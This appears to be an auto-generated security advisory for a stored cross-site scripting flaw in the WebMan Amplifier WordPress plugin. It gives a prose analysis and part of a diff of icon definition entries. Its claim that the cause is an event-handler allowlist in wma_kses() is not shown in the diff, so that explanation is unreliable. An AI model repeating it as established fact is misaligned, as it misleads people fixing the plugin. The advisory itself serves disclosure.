Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-62757: WebMan Amplifier <= 1.5.12 – Authenticated (Contributor+) Stored Cross-Site Scripting (webman-amplifier)

CVE ID CVE-2025-62757
Plugin webman-amplifier
Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 1.5.12
Patched Version 1.6.0
Disclosed December 30, 2025

Analysis Overview

Atomic Edge analysis of CVE-2025-62757:
The WebMan Amplifier WordPress plugin, versions up to and including 1.5.12, contains an authenticated stored cross-site scripting (XSS) vulnerability. The vulnerability resides in the plugin’s icon selection functionality, which insufficiently sanitizes user-supplied icon class names before output. Attackers with contributor-level or higher privileges can inject arbitrary JavaScript payloads that execute in the context of any user viewing the affected page.

Atomic Edge research identified the root cause in the `WM_Icons::setup_icons()` method and its associated icon configuration file. The plugin loads icon definitions from `/webman-amplifier/assets/font/config.php` into a global `$icons` array. User-provided icon class names are then passed to the `wma_kses()` function for sanitization. The vulnerable versions use `wma_kses( $icon_class, ‘icon_class’ )`, which applies an overly permissive allowlist of HTML attributes. This allowlist includes event handler attributes like `onclick`, `onmouseover`, and `onload`, enabling JavaScript execution when the icon class name is rendered in the browser.

The exploitation method requires an authenticated attacker with at least contributor-level access. Attackers can inject malicious payloads via the icon class parameter in plugin shortcodes or widget settings. The payload is stored in the WordPress database and executed whenever a user visits a page containing the compromised shortcode or widget. The attack vector leverages the plugin’s icon rendering mechanism, which directly outputs unsanitized user input within HTML attribute contexts.

The patch modifies the `wma_kses()` function’s behavior for the `icon_class` context. Version 1.6.0 updates the allowlist to remove all event handler attributes (`onclick`, `onmouseover`, `onload`, etc.) from the permitted attribute list. This change prevents JavaScript execution by stripping dangerous attributes from user-supplied icon class names before they reach the browser. The fix ensures icon class names contain only safe, non-executable attributes.

Successful exploitation allows attackers to perform actions within the victim’s WordPress session. This includes creating new administrative accounts, modifying plugin settings, injecting backdoors, redirecting users to malicious sites, and stealing session cookies. The stored nature of the vulnerability means a single injection can affect multiple users over time, amplifying the impact.

Differential between vulnerable and patched code

Code Diff 
--- a/webman-amplifier/assets/font/config.php
+++ b/webman-amplifier/assets/font/config.php
@@ -1,688 +1,817 @@
 <?php
 /**
- * Icon glyphs definitions
+ * Icon glyphs definitions.
  *
- * Font Awesome 4.7 from Fontello.com
+ * Font Awesome 4.7 from Fontello.com.
+ *
+ * This is setting local `$icons` variable in `WM_Icons::setup_icons()`.
  *
  * @package     WebMan Amplifier
  * @subpackage  Font Icons
  *
  * @since    1.0
- * @version  1.4
+ * @version  1.6.0
  */

-$icons['500px']                               = array( 'char' => 'f26e', 'class' => '500px' );
-$icons['address-book-o']                      = array( 'char' => 'f2ba', 'class' => 'address-book-o' );
-$icons['address-book']                        = array( 'char' => 'f2b9', 'class' => 'address-book' );
-$icons['address-card-o']                      = array( 'char' => 'f2bc', 'class' => 'address-card-o' );
-$icons['address-card']                        = array( 'char' => 'f2bb', 'class' => 'address-card' );
-$icons['adjust']                              = array( 'char' => 'e892', 'class' => 'adjust' );
-$icons['adn']                                 = array( 'char' => 'f170', 'class' => 'adn' );
-$icons['align-center']                        = array( 'char' => 'e884', 'class' => 'align-center' );
-$icons['align-justify']                       = array( 'char' => 'e886', 'class' => 'align-justify' );
-$icons['align-left']                          = array( 'char' => 'e883', 'class' => 'align-left' );
-$icons['align-right']                         = array( 'char' => 'e885', 'class' => 'align-right' );
-$icons['amazon']                              = array( 'char' => 'f270', 'class' => 'amazon' );
-$icons['ambulance']                           = array( 'char' => 'f0f9', 'class' => 'ambulance' );
-$icons['american-sign-language-interpreting'] = array( 'char' => 'f2a3', 'class' => 'american-sign-language-interpreting' );
-$icons['anchor']                              = array( 'char' => 'f13d', 'class' => 'anchor' );
-$icons['android']                             = array( 'char' => 'f17b', 'class' => 'android' );
-$icons['angellist']                           = array( 'char' => 'f209', 'class' => 'angellist' );
-$icons['angle-circled-down']                  = array( 'char' => 'f13a', 'class' => 'angle-circled-down' );
-$icons['angle-circled-left']                  = array( 'char' => 'f137', 'class' => 'angle-circled-left' );
-$icons['angle-circled-right']                 = array( 'char' => 'f138', 'class' => 'angle-circled-right' );
-$icons['angle-circled-up']                    = array( 'char' => 'f139', 'class' => 'angle-circled-up' );
-$icons['angle-double-down']                   = array( 'char' => 'f103', 'class' => 'angle-double-down' );
-$icons['angle-double-left']                   = array( 'char' => 'f100', 'class' => 'angle-double-left' );
-$icons['angle-double-right']                  = array( 'char' => 'f101', 'class' => 'angle-double-right' );
-$icons['angle-double-up']                     = array( 'char' => 'f102', 'class' => 'angle-double-up' );
-$icons['angle-down']                          = array( 'char' => 'f107', 'class' => 'angle-down' );
-$icons['angle-left']                          = array( 'char' => 'f104', 'class' => 'angle-left' );
-$icons['angle-right']                         = array( 'char' => 'f105', 'class' => 'angle-right' );
-$icons['angle-up']                            = array( 'char' => 'f106', 'class' => 'angle-up' );
-$icons['apple']                               = array( 'char' => 'f179', 'class' => 'apple' );
-$icons['arrows-cw']                           = array( 'char' => 'e867', 'class' => 'arrows-cw' );
-$icons['asl-interpreting']                    = array( 'char' => 'f2a4', 'class' => 'asl-interpreting' );
-$icons['assistive-listening-systems']         = array( 'char' => 'f2a2', 'class' => 'assistive-listening-systems' );
-$icons['asterisk']                            = array( 'char' => 'e895', 'class' => 'asterisk' );
-$icons['at']                                  = array( 'char' => 'f1fa', 'class' => 'at' );
-$icons['attach']                              = array( 'char' => 'e821', 'class' => 'attach' );
-$icons['attention-alt']                       = array( 'char' => 'f12a', 'class' => 'attention-alt' );
-$icons['attention-circled']                   = array( 'char' => 'e839', 'class' => 'attention-circled' );
-$icons['attention']                           = array( 'char' => 'e838', 'class' => 'attention' );
-$icons['audio-description']                   = array( 'char' => 'f29e', 'class' => 'audio-description' );
-$icons['award']                               = array( 'char' => 'e876', 'class' => 'award' );
-$icons['balance-scale']                       = array( 'char' => 'f24e', 'class' => 'balance-scale' );
-$icons['bandcamp']                            = array( 'char' => 'f2d5', 'class' => 'bandcamp' );
-$icons['bank']                                = array( 'char' => 'f19c', 'class' => 'bank' );
-$icons['barcode']                             = array( 'char' => 'e890', 'class' => 'barcode' );
-$icons['basket']                              = array( 'char' => 'e843', 'class' => 'basket' );
-$icons['bath']                                = array( 'char' => 'f2cd', 'class' => 'bath' );
-$icons['battery-0']                           = array( 'char' => 'f244', 'class' => 'battery-0' );
-$icons['battery-1']                           = array( 'char' => 'f243', 'class' => 'battery-1' );
-$icons['battery-2']                           = array( 'char' => 'f242', 'class' => 'battery-2' );
-$icons['battery-3']                           = array( 'char' => 'f241', 'class' => 'battery-3' );
-$icons['battery-4']                           = array( 'char' => 'f240', 'class' => 'battery-4' );
-$icons['beaker']                              = array( 'char' => 'f0c3', 'class' => 'beaker' );
-$icons['bed']                                 = array( 'char' => 'f236', 'class' => 'bed' );
-$icons['beer']                                = array( 'char' => 'f0fc', 'class' => 'beer' );
-$icons['behance-squared']                     = array( 'char' => 'f1b5', 'class' => 'behance-squared' );
-$icons['behance']                             = array( 'char' => 'f1b4', 'class' => 'behance' );
-$icons['bell-alt']                            = array( 'char' => 'f0f3', 'class' => 'bell-alt' );
-$icons['bell-off-empty']                      = array( 'char' => 'f1f7', 'class' => 'bell-off-empty' );
-$icons['bell-off']                            = array( 'char' => 'f1f6', 'class' => 'bell-off' );
-$icons['bell']                                = array( 'char' => 'e837', 'class' => 'bell' );
-$icons['bicycle']                             = array( 'char' => 'f206', 'class' => 'bicycle' );
-$icons['binoculars']                          = array( 'char' => 'f1e5', 'class' => 'binoculars' );
-$icons['birthday']                            = array( 'char' => 'f1fd', 'class' => 'birthday' );
-$icons['bitbucket-squared']                   = array( 'char' => 'f172', 'class' => 'bitbucket-squared' );
-$icons['bitbucket']                           = array( 'char' => 'f171', 'class' => 'bitbucket' );
-$icons['bitcoin']                             = array( 'char' => 'f15a', 'class' => 'bitcoin' );
-$icons['black-tie']                           = array( 'char' => 'f27e', 'class' => 'black-tie' );
-$icons['blank']                               = array( 'char' => 'f0c8', 'class' => 'blank' );
-$icons['blind']                               = array( 'char' => 'f29d', 'class' => 'blind' );
-$icons['block']                               = array( 'char' => 'e84c', 'class' => 'block' );
-$icons['bluetooth-b']                         = array( 'char' => 'f294', 'class' => 'bluetooth-b' );
-$icons['bluetooth']                           = array( 'char' => 'f293', 'class' => 'bluetooth' );
-$icons['bold']                                = array( 'char' => 'e87f', 'class' => 'bold' );
-$icons['bomb']                                = array( 'char' => 'f1e2', 'class' => 'bomb' );
-$icons['book']                                = array( 'char' => 'e891', 'class' => 'book' );
-$icons['bookmark-empty']                      = array( 'char' => 'f097', 'class' => 'bookmark-empty' );
-$icons['bookmark']                            = array( 'char' => 'e829', 'class' => 'bookmark' );
-$icons['box']                                 = array( 'char' => 'f187', 'class' => 'box' );
-$icons['braille']                             = array( 'char' => 'f2a1', 'class' => 'braille' );
-$icons['briefcase']                           = array( 'char' => 'e88b', 'class' => 'briefcase' );
-$icons['brush']                               = array( 'char' => 'f1fc', 'class' => 'brush' );
-$icons['bug']                                 = array( 'char' => 'f188', 'class' => 'bug' );
-$icons['building-filled']                     = array( 'char' => 'f1ad', 'class' => 'building-filled' );
-$icons['building']                            = array( 'char' => 'f0f7', 'class' => 'building' );
-$icons['bullseye']                            = array( 'char' => 'f140', 'class' => 'bullseye' );
-$icons['bus']                                 = array( 'char' => 'f207', 'class' => 'bus' );
-$icons['buysellads']                          = array( 'char' => 'f20d', 'class' => 'buysellads' );
-$icons['cab']                                 = array( 'char' => 'f1b9', 'class' => 'cab' );
-$icons['calc']                                = array( 'char' => 'f1ec', 'class' => 'calc' );
-$icons['calendar-check-o']                    = array( 'char' => 'f274', 'class' => 'calendar-check-o' );
-$icons['calendar-empty']                      = array( 'char' => 'f133', 'class' => 'calendar-empty' );
-$icons['calendar-minus-o']                    = array( 'char' => 'f272', 'class' => 'calendar-minus-o' );
-$icons['calendar-plus-o']                     = array( 'char' => 'f271', 'class' => 'calendar-plus-o' );
-$icons['calendar-times-o']                    = array( 'char' => 'f273', 'class' => 'calendar-times-o' );
-$icons['calendar']                            = array( 'char' => 'e844', 'class' => 'calendar' );
-$icons['camera-alt']                          = array( 'char' => 'e80f', 'class' => 'camera-alt' );
-$icons['camera']                              = array( 'char' => 'e80e', 'class' => 'camera' );
-$icons['cancel-circled2']                     = array( 'char' => 'e818', 'class' => 'cancel-circled2' );
-$icons['cancel-circled']                      = array( 'char' => 'e817', 'class' => 'cancel-circled' );
-$icons['cancel']                              = array( 'char' => 'e816', 'class' => 'cancel' );
-$icons['cart-arrow-down']                     = array( 'char' => 'f218', 'class' => 'cart-arrow-down' );
-$icons['cart-plus']                           = array( 'char' => 'f217', 'class' => 'cart-plus' );
-$icons['cc-amex']                             = array( 'char' => 'f1f3', 'class' => 'cc-amex' );
-$icons['cc-diners-club']                      = array( 'char' => 'f24c', 'class' => 'cc-diners-club' );
-$icons['cc-discover']                         = array( 'char' => 'f1f2', 'class' => 'cc-discover' );
-$icons['cc-jcb']                              = array( 'char' => 'f24b', 'class' => 'cc-jcb' );
-$icons['cc-mastercard']                       = array( 'char' => 'f1f1', 'class' => 'cc-mastercard' );
-$icons['cc-paypal']                           = array( 'char' => 'f1f4', 'class' => 'cc-paypal' );
-$icons['cc-stripe']                           = array( 'char' => 'f1f5', 'class' => 'cc-stripe' );
-$icons['cc-visa']                             = array( 'char' => 'f1f0', 'class' => 'cc-visa' );
-$icons['cc']                                  = array( 'char' => 'f20a', 'class' => 'cc' );
-$icons['ccw']                                 = array( 'char' => 'e866', 'class' => 'ccw' );
-$icons['certificate']                         = array( 'char' => 'f0a3', 'class' => 'certificate' );
-$icons['chart-area']                          = array( 'char' => 'f1fe', 'class' => 'chart-area' );
-$icons['chart-bar']                           = array( 'char' => 'e899', 'class' => 'chart-bar' );
-$icons['chart-line']                          = array( 'char' => 'f201', 'class' => 'chart-line' );
-$icons['chart-pie']                           = array( 'char' => 'f200', 'class' => 'chart-pie' );
-$icons['chat-empty']                          = array( 'char' => 'f0e6', 'class' => 'chat-empty' );
-$icons['chat']                                = array( 'char' => 'e836', 'class' => 'chat' );
-$icons['check-empty']                         = array( 'char' => 'f096', 'class' => 'check-empty' );
-$icons['check']                               = array( 'char' => 'e894', 'class' => 'check' );
-$icons['child']                               = array( 'char' => 'f1ae', 'class' => 'child' );
-$icons['chrome']                              = array( 'char' => 'f268', 'class' => 'chrome' );
-$icons['circle-empty']                        = array( 'char' => 'f10c', 'class' => 'circle-empty' );
-$icons['circle-notch']                        = array( 'char' => 'f1ce', 'class' => 'circle-notch' );
-$icons['circle-thin']                         = array( 'char' => 'f1db', 'class' => 'circle-thin' );
-$icons['circle']                              = array( 'char' => 'f111', 'class' => 'circle' );
-$icons['clock']                               = array( 'char' => 'e84b', 'class' => 'clock' );
-$icons['clone']                               = array( 'char' => 'f24d', 'class' => 'clone' );
-$icons['cloud']                               = array( 'char' => 'e879', 'class' => 'cloud' );
-$icons['code']                                = array( 'char' => 'f121', 'class' => 'code' );
-$icons['codeopen']                            = array( 'char' => 'f1cb', 'class' => 'codeopen' );
-$icons['codiepie']                            = array( 'char' => 'f284', 'class' => 'codiepie' );
-$icons['coffee']                              = array( 'char' => 'f0f4', 'class' => 'coffee' );
-$icons['cog-alt']                             = array( 'char' => 'e841', 'class' => 'cog-alt' );
-$icons['cog']                                 = array( 'char' => 'e840', 'class' => 'cog' );
-$icons['collapse-left']                       = array( 'char' => 'f191', 'class' => 'collapse-left' );
-$icons['collapse']                            = array( 'char' => 'f151', 'class' => 'collapse' );
-$icons['columns']                             = array( 'char' => 'f0db', 'class' => 'columns' );
-$icons['comment-empty']                       = array( 'char' => 'f0e5', 'class' => 'comment-empty' );
-$icons['comment']                             = array( 'char' => 'e835', 'class' => 'comment' );
-$icons['commenting-o']                        = array( 'char' => 'f27b', 'class' => 'commenting-o' );
-$icons['commenting']                          = array( 'char' => 'f27a', 'class' => 'commenting' );
-$icons['compass']                             = array( 'char' => 'f14e', 'class' => 'compass' );
-$icons['connectdevelop']                      = array( 'char' => 'f20e', 'class' => 'connectdevelop' );
-$icons['contao']                              = array( 'char' => 'f26d', 'class' => 'contao' );
-$icons['copyright']                           = array( 'char' => 'f1f9', 'class' => 'copyright' );
-$icons['creative-commons']                    = array( 'char' => 'f25e', 'class' => 'creative-commons' );
-$icons['credit-card-alt']                     = array( 'char' => 'f283', 'class' => 'credit-card-alt' );
-$icons['credit-card']                         = array( 'char' => 'e89a', 'class' => 'credit-card' );
-$icons['crop']                                = array( 'char' => 'f125', 'class' => 'crop' );
-$icons['css3']                                = array( 'char' => 'f13c', 'class' => 'css3' );
-$icons['cube']                                = array( 'char' => 'f1b2', 'class' => 'cube' );
-$icons['cubes']                               = array( 'char' => 'f1b3', 'class' => 'cubes' );
-$icons['cw']                                  = array( 'char' => 'e865', 'class' => 'cw' );
-$icons['dashcube']                            = array( 'char' => 'f210', 'class' => 'dashcube' );
-$icons['database']                            = array( 'char' => 'f1c0', 'class' => 'database' );
-$icons['delicious']                           = array( 'char' => 'f1a5', 'class' => 'delicious' );
-$icons['desktop']                             = array( 'char' => 'f108', 'class' => 'desktop' );
-$icons['deviantart']                          = array( 'char' => 'f1bd', 'class' => 'deviantart' );
-$icons['diamond']                             = array( 'char' => 'f219', 'class' => 'diamond' );
-$icons['digg']                                = array( 'char' => 'f1a6', 'class' => 'digg' );
-$icons['direction']                           = array( 'char' => 'f124', 'class' => 'direction' );
-$icons['doc-inv']                             = array( 'char' => 'f15b', 'class' => 'doc-inv' );
-$icons['doc-text-inv']                        = array( 'char' => 'f15c', 'class' => 'doc-text-inv' );
-$icons['doc-text']                            = array( 'char' => 'f0f6', 'class' => 'doc-text' );
-$icons['doc']                                 = array( 'char' => 'e83c', 'class' => 'doc' );
-$icons['docs']                                = array( 'char' => 'f0c5', 'class' => 'docs' );
-$icons['dollar']                              = array( 'char' => 'f155', 'class' => 'dollar' );
-$icons['dot-circled']                         = array( 'char' => 'f192', 'class' => 'dot-circled' );
-$icons['down-big']                            = array( 'char' => 'e85d', 'class' => 'down-big' );
-$icons['down-circled2']                       = array( 'char' => 'e853', 'class' => 'down-circled2' );
-$icons['down-circled']                        = array( 'char' => 'f0ab', 'class' => 'down-circled' );
-$icons['down-dir']                            = array( 'char' => 'e855', 'class' => 'down-dir' );
-$icons['down-hand']                           = array( 'char' => 'e864', 'class' => 'down-hand' );
-$icons['down-open']                           = array( 'char' => 'e859', 'class' => 'down-open' );
-$icons['down']                                = array( 'char' => 'f175', 'class' => 'down' );
-$icons['download-cloud']                      = array( 'char' => 'f0ed', 'class' => 'download-cloud' );
-$icons['download']                            = array( 'char' => 'e82d', 'class' => 'download' );
-$icons['dribbble']                            = array( 'char' => 'f17d', 'class' => 'dribbble' );
-$icons['dropbox']                             = array( 'char' => 'f16b', 'class' => 'dropbox' );
-$icons['drupal']                              = array( 'char' => 'f1a9', 'class' => 'drupal' );
-$icons['edge']                                = array( 'char' => 'f282', 'class' => 'edge' );
-$icons['edit']                                = array( 'char' => 'e832', 'class' => 'edit' );
-$icons['eercast']                             = array( 'char' => 'f2da', 'class' => 'eercast' );
-$icons['eject']                               = array( 'char' => 'e873', 'class' => 'eject' );
-$icons['ellipsis-vert']                       = array( 'char' => 'f142', 'class' => 'ellipsis-vert' );
-$icons['ellipsis']                            = array( 'char' => 'f141', 'class' => 'ellipsis' );
-$icons['empire']                              = array( 'char' => 'f1d1', 'class' => 'empire' );
-$icons['envelope-open-o']                     = array( 'char' => 'f2b7', 'class' => 'envelope-open-o' );
-$icons['envelope-open']                       = array( 'char' => 'f2b6', 'class' => 'envelope-open' );
-$icons['envira']                              = array( 'char' => 'f299', 'class' => 'envira' );
-$icons['eraser']                              = array( 'char' => 'f12d', 'class' => 'eraser' );
-$icons['etsy']                                = array( 'char' => 'f2d7', 'class' => 'etsy' );
-$icons['euro']                                = array( 'char' => 'f153', 'class' => 'euro' );
-$icons['exchange']                            = array( 'char' => 'f0ec', 'class' => 'exchange' );
-$icons['expand-right']                        = array( 'char' => 'f152', 'class' => 'expand-right' );
-$icons['expand']                              = array( 'char' => 'f150', 'class' => 'expand' );
-$icons['expeditedssl']                        = array( 'char' => 'f23e', 'class' => 'expeditedssl' );
-$icons['export-alt']                          = array( 'char' => 'f14d', 'class' => 'export-alt' );
-$icons['export']                              = array( 'char' => 'e830', 'class' => 'export' );
-$icons['extinguisher']                        = array( 'char' => 'f134', 'class' => 'extinguisher' );
-$icons['eye-off']                             = array( 'char' => 'e826', 'class' => 'eye-off' );
-$icons['eye']                                 = array( 'char' => 'e825', 'class' => 'eye' );
-$icons['eyedropper']                          = array( 'char' => 'f1fb', 'class' => 'eyedropper' );
-$icons['facebook-official']                   = array( 'char' => 'f230', 'class' => 'facebook-official' );
-$icons['facebook-squared']                    = array( 'char' => 'f308', 'class' => 'facebook-squared' );
-$icons['facebook']                            = array( 'char' => 'f09a', 'class' => 'facebook' );
-$icons['fast-bw']                             = array( 'char' => 'e872', 'class' => 'fast-bw' );
-$icons['fast-fw']                             = array( 'char' => 'e871', 'class' => 'fast-fw' );
-$icons['fax']                                 = array( 'char' => 'f1ac', 'class' => 'fax' );
-$icons['female']                              = array( 'char' => 'f182', 'class' => 'female' );
-$icons['fighter-jet']                         = array( 'char' => 'f0fb', 'class' => 'fighter-jet' );
-$icons['file-archive']                        = array( 'char' => 'f1c6', 'class' => 'file-archive' );
-$icons['file-audio']                          = array( 'char' => 'f1c7', 'class' => 'file-audio' );
-$icons['file-code']                           = array( 'char' => 'f1c9', 'class' => 'file-code' );
-$icons['file-excel']                          = array( 'char' => 'f1c3', 'class' => 'file-excel' );
-$icons['file-image']                          = array( 'char' => 'f1c5', 'class' => 'file-image' );
-$icons['file-pdf']                            = array( 'char' => 'f1c1', 'class' => 'file-pdf' );
-$icons['file-powerpoint']                     = array( 'char' => 'f1c4', 'class' => 'file-powerpoint' );
-$icons['file-video']                          = array( 'char' => 'f1c8', 'class' => 'file-video' );
-$icons['file-word']                           = array( 'char' => 'f1c2', 'class' => 'file-word' );
-$icons['filter']                              = array( 'char' => 'f0b0', 'class' => 'filter' );
-$icons['fire']                                = array( 'char' => 'e897', 'class' => 'fire' );
-$icons['firefox']                             = array( 'char' => 'f269', 'class' => 'firefox' );
-$icons['first-order']                         = array( 'char' => 'f2b0', 'class' => 'first-order' );
-$icons['flag-checkered']                      = array( 'char' => 'f11e', 'class' => 'flag-checkered' );
-$icons['flag-empty']                          = array( 'char' => 'f11d', 'class' => 'flag-empty' );
-$icons['flag']                                = array( 'char' => 'e82a', 'class' => 'flag' );
-$icons['flash']                               = array( 'char' => 'e87a', 'class' => 'flash' );
-$icons['flickr']                              = array( 'char' => 'f16e', 'class' => 'flickr' );
-$icons['flight']                              = array( 'char' => 'e87c', 'class' => 'flight' );
-$icons['floppy']                              = array( 'char' => 'e89b', 'class' => 'floppy' );
-$icons['folder-empty']                        = array( 'char' => 'f114', 'class' => 'folder-empty' );
-$icons['folder-open-empty']                   = array( 'char' => 'f115', 'class' => 'folder-open-empty' );
-$icons['folder-open']                         = array( 'char' => 'e83e', 'class' => 'folder-open' );
-$icons['folder']                              = array( 'char' => 'e83d', 'class' => 'folder' );
-$icons['font-awesome']                        = array( 'char' => 'f2b4', 'class' => 'font-awesome' );
-$icons['font']                                = array( 'char' => 'e87e', 'class' => 'font' );
-$icons['fonticons']                           = array( 'char' => 'f280', 'class' => 'fonticons' );
-$icons['food']                                = array( 'char' => 'f0f5', 'class' => 'food' );
-$icons['fork']                                = array( 'char' => 'f126', 'class' => 'fork' );
-$icons['fort-awesome']                        = array( 'char' => 'f286', 'class' => 'fort-awesome' );
-$icons['forumbee']                            = array( 'char' => 'f211', 'class' => 'forumbee' );
-$icons['forward']                             = array( 'char' => 'e82f', 'class' => 'forward' );
-$icons['foursquare']                          = array( 'char' => 'f180', 'class' => 'foursquare' );
-$icons['free-code-camp']                      = array( 'char' => 'f2c5', 'class' => 'free-code-camp' );
-$icons['frown']                               = array( 'char' => 'f119', 'class' => 'frown' );
-$icons['gamepad']                             = array( 'char' => 'f11b', 'class' => 'gamepad' );
-$icons['gauge']                               = array( 'char' => 'f0e4', 'class' => 'gauge' );
-$icons['genderless']                          = array( 'char' => 'f22d', 'class' => 'genderless' );
-$icons['get-pocket']                          = array( 'char' => 'f265', 'class' => 'get-pocket' );
-$icons['gg-circle']                           = array( 'char' => 'f261', 'class' => 'gg-circle' );
-$icons['gg']                                  = array( 'char' => 'f260', 'class' => 'gg' );
-$icons['gift']                                = array( 'char' => 'e896', 'class' => 'gift' );
-$icons['git-squared']                         = array( 'char' => 'f1d2', 'class' => 'git-squared' );
-$icons['git']                                 = array( 'char' => 'f1d3', 'class' => 'git' );
-$icons['github-circled']                      = array( 'char' => 'f09b', 'class' => 'github-circled' );
-$icons['github-squared']                      = array( 'char' => 'f300', 'class' => 'github-squared' );
-$icons['github']                              = array( 'char' => 'f113', 'class' => 'github' );
-$icons['gitlab']                              = array( 'char' => 'f296', 'class' => 'gitlab' );
-$icons['gittip']                              = array( 'char' => 'f184', 'class' => 'gittip' );
-$icons['glass']                               = array( 'char' => 'e800', 'class' => 'glass' );
-$icons['glide-g']                             = array( 'char' => 'f2a6', 'class' => 'glide-g' );
-$icons['glide']                               = array( 'char' => 'f2a5', 'class' => 'glide' );
-$icons['globe']                               = array( 'char' => 'e878', 'class' => 'globe' );
-$icons['google-plus-circle']                  = array( 'char' => 'f2b3', 'class' => 'google-plus-circle' );
-$icons['google']                              = array( 'char' => 'f1a0', 'class' => 'google' );
-$icons['gplus-squared']                       = array( 'char' => 'f0d4', 'class' => 'gplus-squared' );
-$icons['gplus']                               = array( 'char' => 'f0d5', 'class' => 'gplus' );
-$icons['graduation-cap']                      = array( 'char' => 'f19d', 'class' => 'graduation-cap' );
-$icons['grav']                                = array( 'char' => 'f2d6', 'class' => 'grav' );
-$icons['gwallet']                             = array( 'char' => 'f1ee', 'class' => 'gwallet' );
-$icons['h-sigh']                              = array( 'char' => 'f0fd', 'class' => 'h-sigh' );
-$icons['hacker-news']                         = array( 'char' => 'f1d4', 'class' => 'hacker-news' );
-$icons['hammer']                              = array( 'char' => 'e89f', 'class' => 'hammer' );
-$icons['hand-grab-o']                         = array( 'char' => 'f255', 'class' => 'hand-grab-o' );
-$icons['hand-lizard-o']                       = array( 'char' => 'f258', 'class' => 'hand-lizard-o' );
-$icons['hand-paper-o']                        = array( 'char' => 'f256', 'class' => 'hand-paper-o' );
-$icons['hand-peace-o']                        = array( 'char' => 'f25b', 'class' => 'hand-peace-o' );
-$icons['hand-pointer-o']                      = array( 'char' => 'f25a', 'class' => 'hand-pointer-o' );
-$icons['hand-scissors-o']                     = array( 'char' => 'f257', 'class' => 'hand-scissors-o' );
-$icons['hand-spock-o']                        = array( 'char' => 'f259', 'class' => 'hand-spock-o' );
-$icons['handshake-o']                         = array( 'char' => 'f2b5', 'class' => 'handshake-o' );
-$icons['hashtag']                             = array( 'char' => 'f292', 'class' => 'hashtag' );
-$icons['hdd']                                 = array( 'char' => 'f0a0', 'class' => 'hdd' );
-$icons['header']                              = array( 'char' => 'f1dc', 'class' => 'header' );
-$icons['headphones']                          = array( 'char' => 'e84a', 'class' => 'headphones' );
-$icons['heart-empty']                         = array( 'char' => 'e805', 'class' => 'heart-empty' );
-$icons['heart']                               = array( 'char' => 'e804', 'class' => 'heart' );
-$icons['heartbeat']                           = array( 'char' => 'f21e', 'class' => 'heartbeat' );
-$icons['help-circled']                        = array( 'char' => 'e81d', 'class' => 'help-circled' );
-$icons['help']                                = array( 'char' => 'f128', 'class' => 'help' );
-$icons['history']                             = array( 'char' => 'f1da', 'class' => 'history' );
-$icons['home']                                = array( 'char' => 'e81f', 'class' => 'home' );
-$icons['hospital']                            = array( 'char' => 'f0f8', 'class' => 'hospital' );
-$icons['hourglass-1']                         = array( 'char' => 'f251', 'class' => 'hourglass-1' );
-$icons['hourglass-2']                         = array( 'char' => 'f252', 'class' => 'hourglass-2' );
-$icons['hourglass-3']                         = array( 'char' => 'f253', 'class' => 'hourglass-3' );
-$icons['hourglass-o']                         = array( 'char' => 'f250', 'class' => 'hourglass-o' );
-$icons['hourglass']                           = array( 'char' => 'f254', 'class' => 'hourglass' );
-$icons['houzz']                               = array( 'char' => 'f27c', 'class' => 'houzz' );
-$icons['html5']                               = array( 'char' => 'f13b', 'class' => 'html5' );
-$icons['i-cursor']                            = array( 'char' => 'f246', 'class' => 'i-cursor' );
-$icons['id-badge']                            = array( 'char' => 'f2c1', 'class' => 'id-badge' );
-$icons['id-card-o']                           = array( 'char' => 'f2c3', 'class' => 'id-card-o' );
-$icons['id-card']                             = array( 'char' => 'f2c2', 'class' => 'id-card' );
-$icons['imdb']                                = array( 'char' => 'f2d8', 'class' => 'imdb' );
-$icons['inbox']                               = array( 'char' => 'e877', 'class' => 'inbox' );
-$icons['indent-left']                         = array( 'char' => 'e888', 'class' => 'indent-left' );
-$icons['indent-right']                        = array( 'char' => 'e889', 'class' => 'indent-right' );
-$icons['industry']                            = array( 'char' => 'f275', 'class' => 'industry' );
-$icons['info-circled']                        = array( 'char' => 'e81e', 'class' => 'info-circled' );
-$icons['info']                                = array( 'char' => 'f129', 'class' => 'info' );
-$icons['instagram']                           = array( 'char' => 'f16d', 'class' => 'instagram' );
-$icons['internet-explorer']                   = array( 'char' => 'f26b', 'class' => 'internet-explorer' );
-$icons['ioxhost']                             = array( 'char' => 'f208', 'class' => 'ioxhost' );
-$icons['italic']                              = array( 'char' => 'e880', 'class' => 'italic' );
-$icons['joomla']                              = array( 'char' => 'f1aa', 'class' => 'joomla' );
-$icons['jsfiddle']                            = array( 'char' => 'f1cc', 'class' => 'jsfiddle' );
-$icons['key']                                 = array( 'char' => 'e89d', 'class' => 'key' );
-$icons['keyboard']                            = array( 'char' => 'f11c', 'class' => 'keyboard' );
-$icons['language']                            = array( 'char' => 'f1ab', 'class' => 'language' );
-$icons['laptop']                              = array( 'char' => 'f109', 'class' => 'laptop' );
-$icons['lastfm-squared']                      = array( 'char' => 'f203', 'class' => 'lastfm-squared' );
-$icons['lastfm']                              = array( 'char' => 'f202', 'class' => 'lastfm' );
-$icons['leaf']                                = array( 'char' => 'e87d', 'class' => 'leaf' );
-$icons['leanpub']                             = array( 'char' => 'f212', 'class' => 'leanpub' );
-$icons['left-big']                            = array( 'char' => 'e85e', 'class' => 'left-big' );
-$icons['left-circled2']                       = array( 'char' => 'f190', 'class' => 'left-circled2' );
-$icons['left-circled']                        = array( 'char' => 'f0a8', 'class' => 'left-circled' );
-$icons['left-dir']                            = array( 'char' => 'e857', 'class' => 'left-dir' );
-$icons['left-hand']                           = array( 'char' => 'e862', 'class' => 'left-hand' );
-$icons['left-open']                           = array( 'char' => 'e85a', 'class' => 'left-open' );
-$icons['left']                                = array( 'char' => 'f177', 'class' => 'left' );
-$icons['lemon']                               = array( 'char' => 'e8a0', 'class' => 'lemon' );
-$icons['level-down']                          = array( 'char' => 'f149', 'class' => 'level-down' );
-$icons['level-up']                            = array( 'char' => 'f148', 'class' => 'level-up' );
-$icons['lifebuoy']                            = array( 'char' => 'f1cd', 'class' => 'lifebuoy' );
-$icons['lightbulb']                           = array( 'char' => 'f0eb', 'class' => 'lightbulb' );
-$icons['link-ext-alt']                        = array( 'char' => 'f14c', 'class' => 'link-ext-alt' );
-$icons['link-ext']                            = array( 'char' => 'f08e', 'class' => 'link-ext' );
-$icons['link']                                = array( 'char' => 'e820', 'class' => 'link' );
-$icons['linkedin-squared']                    = array( 'char' => 'f30c', 'class' => 'linkedin-squared' );
-$icons['linkedin']                            = array( 'char' => 'f0e1', 'class' => 'linkedin' );
